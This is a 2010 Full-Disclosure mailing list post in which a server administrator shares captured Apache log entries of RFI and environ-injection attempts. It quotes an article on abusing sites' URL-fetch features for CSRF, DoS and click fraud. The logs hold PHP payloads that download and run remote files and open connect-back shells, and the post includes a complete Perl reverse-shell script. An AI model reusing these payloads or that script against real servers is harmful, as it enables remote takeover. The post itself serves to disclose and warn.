-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 I have been witnessing such attacks in the past few weeks. Most of the urls are trying to exploit components of web software that I do not have installed. Some do GET existing pages such as index.php and tag the attack on the end. Such attacks began about 2 weeks ago. These attacks have so far come from three different IP addresses. and I was getting around a dozen such accesses every other day. I think my server is pretty secure, but I am a novice so what do I really know? And as such I have blocked these IP's from accessing my server. FYI The originating IP's all have wordpress blogs on them.
If anyone is interested here is one such attack: <apache2 log entry> 88.181.49.182 - - [28/Jun/2010:19:54:35 +0100] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://212.154.190.140/back.txt?? HTTP/1.1" 404 220 "-" "<?system('cd /var/tmp;wget http://212.154.190.140/cb.txt;perl cb.txt 192.24.5.30 80;wget http://212.154.190.140/cback;chmod +x cback;./cback 192.24.5.30 80;cd /dev/shm;curl -O http://212.154.190.140/cb.txt;perl cb.txt 192.24.5.30 80;curl -O http://212.154.190.140/cback;chmod +x cback;./cback 192.24.5.30 80');?>;<?exec_shell('cd /var/tmp;wget http://212.154.190.140/cb.txt;perl cb.txt 192.24.5.30 80;wget http://212.154.190.140/cback;chmod +x cback;./cback 192.24.5.30 80;cd /dev/shm;curl -O http://212.154.190.140/cb.txt;perl cb.txt 192.24.5.30 80;curl -O http://212.154.190.140/cback;chmod +x cback;./cback 192.24.5.30 80');?>;<?passthru('cd /var/tmp;wget http://212.154.190.140/cb.txt;perl cb.txt 192.24.5.30 80;wget http://212.154.190.140/cback;chmod +x cback;./cback 192.24.5.30 80;cd /dev/shm;curl -O http://212.154.190.140/cb.txt;perl cb.txt 192.24.5.30 80;curl -O http://212.154.190.140/cback;chmod +x cback;./cback 192.24.5.30 80');?> ; Ustupid MF is Back ; Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)" Here is another example: 94.199.181.165 - - [21/Jun/2010:05:36:27 +0100] "GET /index.php?_SERVER[ConfigFile]=../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 200 3775 "-" "<?system('cd /var/tmp;wget http://195.239.120.69/cb.txt;perl cb.txt 192.24.5.30 80;wget http://195.239.120.69/cback;chmod +x cback;./cback 192.24.5.30 80;cd /dev/shm;curl - -O http://195.239.120.69/cb.txt;perl cb.txt 192.24.5.30 80;curl -O http://195.239.120.69/cback;chmod +x cback;./cback 192.24.5.30 80');?> ;<?exec_shell('cd /var/tmp;wget http://195.239.120.69/cb.txt;perl cb.txt 192.24.5.30 80;wget http://195.239.120.69/cback;chmod +x cback;./cback 192.24.5.30 80;cd /dev/shm;curl -O http://195.239.120.69/cb.txt;perl cb.txt 192.24.5.30 80;curl -O http://195.239.120.69/cback;chmod +x cback;./cback 192.24.5.30 80');?> ;<?passthru('cd /var/tmp;wget http://195.239.120.69/cb.txt;perl cb.txt 192.24.5.30 80;wget http://195.239.120.69/cback;chmod +x cback;./cback 192.24.5.30 80;cd /dev/shm;curl -O http://195.239.120.69/cb.txt;perl cb.txt 192.24.5.30 80;curl -O http://195.239.120.69/cback;chmod +x cback;./cback 192.24.5.30 80');?>;Ustupid MF is Back; Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)" </apache2 log entries> <cb.txt content> #!/usr/bin/perl use Socket; $cmd= "lynx"; $system= 'echo "`uname -a`";echo "`id`";HISTFILE=/dev/null /bin/sh -i'; $0=$cmd; $target=$ARGV[0]; $port=$ARGV[1]; $iaddr=inet_aton($target) || die("Error: $!\n"); $paddr=sockaddr_in($port, $iaddr) || die("Error: $!\n"); $proto=getprotobyname('tcp'); socket(SOCKET, PF_INET, SOCK_STREAM, $proto) || die("Error: $!\n"); connect(SOCKET, $paddr) || die("Error: $!\n"); open(STDIN, ">&SOCKET"); open(STDOUT, ">&SOCKET"); open(STDERR, ">&SOCKET"); system($system); close(STDIN); close(STDOUT); close(STDERR); </cb.txt content> If anyone would like more log entries let me know. If all this is beneath you guys.... sorry I bothered you. regards Dave On 28/06/2010 21:13, MustLive wrote: > Hello participants of Full-Disclosure! > > For last two months I didn't post my articles to this list due to some not > serious moaning in April on some of my articles (you always can find my > articles at my site and in WASC Mailing List). But at the end of June I > decided to remind you about my last articles. > > Recently I wrote new article Using of the sites for attacks on other sites > (http://websecurity.com.ua/4322/). This is brief English version of it. > > Last year in article DoS attacks via Abuse of Functionality vulnerabilities > (it was mentioned at > http://jeremiahgrossman.blogspot.com/2010/01/top-ten-web-hacking-techniques-of-2009.html) > I told about possibility of conducting of DoS attacks via Abuse of > Functionality vulnerabilities at other sites. Particularly I showed examples > of such vulnerabilities at web sites regex.info and www.slideshare.net. > These attacks can be as unidirectional DoS, as bidirectional DoS, depending > on capacities of both servers. > > And now I'll tell you about possibility of conducting of CSRF attacks on > other sites via Abuse of Functionality vulnerabilities. Researching of such > attacks I begun already at 2007 when found such vulnerability at regex.info. > > Using of Abuse of Functionality for attacks on other sites. > > Sites, which allow to make requests to other web sites (to arbitrary web > pages), have Abuse of Functionality vulnerability and can be used for > conducting of CSRF attacks on other sites. Including DoS attacks via Abuse > of Functionality, as it was mentioned above. CSRF attacks can be made only > to those pages, which don't require authorization. > > For these attacks it's possible to use as Abuse of Functionality > vulnerabilities (similar to mentioned in this article), as Remote File > Include vulnerabilities (like in PHP applications) - it's Abuse of > Functionality via RFI. > > This attack method can be of use when it's needed to conduct invisible CSRF > attack on other site (to not show yourself), for conducting of DoS and DDoS > attacks and for conducting of other attacks, particularly for making > different actions which need to be made from different IP. For example, at > online voting, for turning of hits of counters and hits of advertising at > the site, and also for turning of clicks (click fraud). > > Abuse of Functionality: > > Attack is going at request of one site (http://site) to another > (http://another_site) at using of appropriate function of the site > (http://site/script). > > http://site/script?url=http://another_site > > Advantages of this attack method. > > In this part of the article I wrote a list of advantages of this attack > method. And I mentioned another two important paragraphs: > > Note, that this DoS attack is possible to use for attacks on redirectors, > which I wrote about in my articles Redirector’s hell and Hellfire for > redirectors. > > Also at conducting of DoS attacks it's possible to use several such servers > at once and so to conduct DDoS attack. In such case these servers will be > appearing as zombie-computers. I.e. botnet will be made from not home > computers, but from web servers (which can have larger capacities and faster > connections). So these vulnerabilities can lead to appearing of new class of > botnets (with zombie-servers). > > Examples of vulnerable web sites and web services. > > In this part of the article I showed examples of different web sites and web > services which could be used for conducting of attacks on other sites. > Including regex.info, www.slideshare.net, anonymouse.org, www.google.com, > translate.google.com, babelfish.altavista.com, babelfish.yahoo.com, > keepvid.com, web application Firebook, W3C validators and iGoogle. > > Best wishes & regards, > MustLive > Administrator of Websecurity web site > http://websecurity.com.ua > > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ - -- Mankind's systems are white sticks tapping walls. Thanks Roy http://www.propergander.org.uk -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.2 (MingW32) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/ iQEVAwUBTCrwtbIvn8UFHWSmAQLN3gf/Z9Jk5uvNnPxF0JWIvziYJP0XBTiCE6uq AInlGmQnEOcLXZDROfzYFpwe4DK1eAdCvRu4tKAvsd12fbgPBFqDLXDbE+Pscja8 5FMLOBdcEDav2E6u7+oZbslA79h040CTw6Hl8v9u8EEK3yiP8Tt8zL2Sb2omTMqu jfIk6Nqs6fx+6hkj3da5hYH+JZ5jz12o50aRXoAqbqkpwapukI3MQvVvoTcvfJgb cEToFjqIWE1jALHN7DAJGPF8RDBQVmzYcSdDCSbgGDC/HMZEBblD2TsLMmaNqVqm ydgSib1wQQW634aEeLdxmN+0A5XONgkB9MfAVvwgjqPX3S9JV2Ufzw== =Y7oL -----END PGP SIGNATURE----- _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/